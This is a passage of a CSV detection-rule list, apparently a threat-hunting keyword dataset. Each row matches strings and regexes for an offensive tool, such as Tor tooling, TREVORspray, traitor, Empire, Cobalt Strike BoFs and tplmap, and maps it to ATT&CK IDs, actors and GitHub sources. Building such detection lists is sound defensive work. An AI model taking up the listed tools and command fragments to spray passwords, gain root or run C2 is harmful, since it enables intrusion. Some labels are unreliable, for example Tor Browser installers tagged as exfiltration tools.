T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web stop*",".{0,1000}tor2web\sstop.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web.pid*",".{0,1000}tor2web\.pid.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web.service*",".{0,1000}tor2web\.service.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web/Tor2web*",".{0,1000}tor2web\/Tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web_notification_form*",".{0,1000}tor2web_notification_form.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-cert.pem*",".{0,1000}tor2web\-cert\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-default.conf*",".{0,1000}tor2web\-default\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-dh.pem*",".{0,1000}tor2web\-dh\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-globaleaks.conf*",".{0,1000}tor2web\-globaleaks\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-hidden*",".{0,1000}tor2web\-hidden.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-intermediate.pem*",".{0,1000}tor2web\-intermediate\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-key.pem*",".{0,1000}tor2web\-key\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-visible*",".{0,1000}tor2web\-visible.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*TORAnonymizer.ps1*",".{0,1000}TORAnonymizer\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*TorBrowser-*macos_ALL.dmg*",".{0,1000}TorBrowser\-.{0,1000}macos_ALL\.dmg.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*torbrowser-install-*_ALL.exe",".{0,1000}torbrowser\-install\-.{0,1000}_ALL\.exe","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*torbrowser-install-win*.exe*",".{0,1000}torbrowser\-install\-win.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*tor-browser-linux*_ALL.tar.xz*",".{0,1000}tor\-browser\-linux.{0,1000}_ALL\.tar\.xz.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*torEd25519*",".{0,1000}torEd25519.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*tor-geoipdb:all*",".{0,1000}tor\-geoipdb\:all.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*tor-geoipdb:amd64*",".{0,1000}tor\-geoipdb\:amd64.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*torify curl *",".{0,1000}torify\scurl\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*torify ghaur *",".{0,1000}torify\sghaur\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*torify nuclei *",".{0,1000}torify\snuclei\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*torify sqlmap *",".{0,1000}torify\ssqlmap\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*torproject*",".{0,1000}torproject.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*torproject.org/dist/torbrowser/*.*",".{0,1000}torproject\.org\/dist\/torbrowser\/.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*--tor-proxy*--pwndb*",".{0,1000}\-\-tor\-proxy.{0,1000}\-\-pwndb.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*TorPylle*",".{0,1000}TorPylle.{0,1000}","offensive_tool_keyword","TorPylle","A Python / Scapy implementation of the OR (TOR) protocol.","T1573 - T1572 - T1553 - T1041 - T1090","TA0002 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/cea-sec/TorPylle","1","0","N/A","N/A","1","95","20","2021-10-03T18:08:41Z","2013-07-23T11:38:39Z" "*TorServiceSetup*",".{0,1000}TorServiceSetup.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","0","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*torsocks:amd64*",".{0,1000}torsocks\:amd64.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Total number of passwords to test: *",".{0,1000}Total\snumber\sof\spasswords\sto\stest\:\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*totally legit pdf.pdf*",".{0,1000}totally\slegit\spdf\.pdf.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*tothi/dll-hijack-by-proxying*",".{0,1000}tothi\/dll\-hijack\-by\-proxying.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","1","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*toto %3e c:\\temp\\toto.txt*",".{0,1000}toto\s\%3e\sc\:\\\\temp\\\\toto\.txt.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*tplmap*",".{0,1000}tplmap.{0,1000}","offensive_tool_keyword","tplmap","Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.","T1059 - T1210.001 - T1589 - T1175","TA0002 - TA0007 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/epinna/tplmap","1","0","N/A","N/A","10","3630","662","2024-04-21T14:47:13Z","2016-07-06T20:33:18Z" "*tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq*",".{0,1000}tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*trailofbits/onesixtyone*",".{0,1000}trailofbits\/onesixtyone.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*trainr3kt/MemReader_BoF*",".{0,1000}trainr3kt\/MemReader_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*trainr3kt/Readfile_BoF*",".{0,1000}trainr3kt\/Readfile_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","19","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*traitor -a *",".{0,1000}traitor\s\-a\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*traitor --any *",".{0,1000}traitor\s\-\-any\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*traitor -e *",".{0,1000}traitor\s\-e\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*traitor --exploit*",".{0,1000}traitor\s\-\-exploit.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*traitor -p *",".{0,1000}traitor\s\-p\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*tree_connect_andx_request*",".{0,1000}tree_connect_andx_request.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Trevohack/DynastyPersist*",".{0,1000}Trevohack\/DynastyPersist.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*TrevorC2*",".{0,1000}TrevorC2.{0,1000}","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","1","N/A","10","10","1177","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" "*trevorproxy ssh*",".{0,1000}trevorproxy\sssh.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorproxy subnet*",".{0,1000}trevorproxy\ssubnet.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorsaudi/Mshikaki*",".{0,1000}trevorsaudi\/Mshikaki.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*trevorspray -*",".{0,1000}trevorspray\s\-.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray *--recon *",".{0,1000}trevorspray\s.{0,1000}\-\-recon\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*trevorspray -u *",".{0,1000}trevorspray\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*trevorspray.cli*",".{0,1000}trevorspray\.cli.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray.enumerators*",".{0,1000}trevorspray\.enumerators.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray.looters*",".{0,1000}trevorspray\.looters.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray.py*",".{0,1000}trevorspray\.py.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray.sprayers*",".{0,1000}trevorspray\.sprayers.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray/existent_users.txt*",".{0,1000}trevorspray\/existent_users\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray/valid_logins.txt*",".{0,1000}trevorspray\/valid_logins\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 